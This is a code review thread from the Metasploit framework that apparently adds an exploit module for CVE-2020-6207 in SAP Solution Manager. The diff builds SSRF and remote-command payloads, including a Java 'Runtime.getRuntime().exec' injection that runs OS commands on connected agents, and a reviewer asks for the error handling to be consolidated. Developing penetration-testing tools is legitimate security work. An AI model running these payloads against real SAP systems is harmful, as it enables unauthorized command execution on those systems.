modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb

```diff
@@ -0,0 +1,238 @@
+          ['EXEC', { 'Description' => 'Exec OS command on connected agent' }]
+        ],
+        'DefaultAction' => 'LIST',
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('URIPATH', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('SSRF_METHOD', [false, 'HTTP method for SSRF', 'GET']),
+        OptString.new('SSRF_URI', [false, 'URI for SSRF', 'http://127.0.0.1:80/']),
+        OptString.new('COMMAND', [false, 'Command for execute in agent', 'id']),
+        OptString.new('AGENT', [false, 'Agent server name for exec command or SSRF', 'agent_server_name']),
+      ]
+    )
+    self.class.agents = Array.new
+  end
+
+  class << self
+    attr_reader :agents
+  end
+
+  class << self
+    attr_writer :agents
+  end
+
+  def setup_xml_and_variables
+    @host = datastore['RHOSTS']
+    @port = datastore['RPORT']
+    @path = datastore['URIPATH']
+
+    @agent_name = datastore['AGENT']
+    @script_name = Rex::Text.rand_text_alphanumeric(12)
+
+    if datastore['SSL']
+      @schema = 'https://'
+    else
+      @schema = 'http://'
+    end
+
+    @solman_uri = "#{@schema}#{@host}:#{@port}#{@path}"
+
+    @ssrf_method = datastore['SSRF_METHOD']
+    @ssrf_uri = datastore['SSRF_URI']
+    @ssrf_payload = make_ssrf_payload(@ssrf_method, @ssrf_uri)
+
+    @rce_command = datastore['COMMAND']
+    @rce_payload = make_rce_payload("Packages.java.lang.Runtime.getRuntime().exec('#{@rce_command}').waitFor();")
+  end
+
+  # Analyze runtime error message from SAP Solution Manager client
+  def analyze_error(error_message)
+    case error_message
+    when 'The server not responding'
+      fail_with(Failure::Unreachable, 'The server not responding.')
+    when 'Bad response status code'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response status code not in the expected status code: 200. The target is likely patched.')
+    when 'Response content type is not text/xml'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body not in the expected content type: text/xml. The target is likely patched.')
+    when 'Failed to parse response body'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body not in the expected format. The target is likely patched.')
+    when 'Response body does not contain a SOAP body'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body does not contain a SOAP body. The target is likely patched.')
+    when 'Response body contains errors'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body contains errors.')
+    else
+      fail_with(Failure::UnexpectedReply, 'The server did not respond in the expected manner.')
+    end
+  end
```

Comment:
This logic should be consolidated with `check_response`. Once that's been updated to use `fail_with` this shouldn't be necessary anymore, just set the message in there.

Reply:
Deleted analyze_error in auxiliary module: https://github.com/rapid7/metasploit-framework/pull/14924/commits/6aba44c4d53984637bf23ec717f7ba1d10f3e10d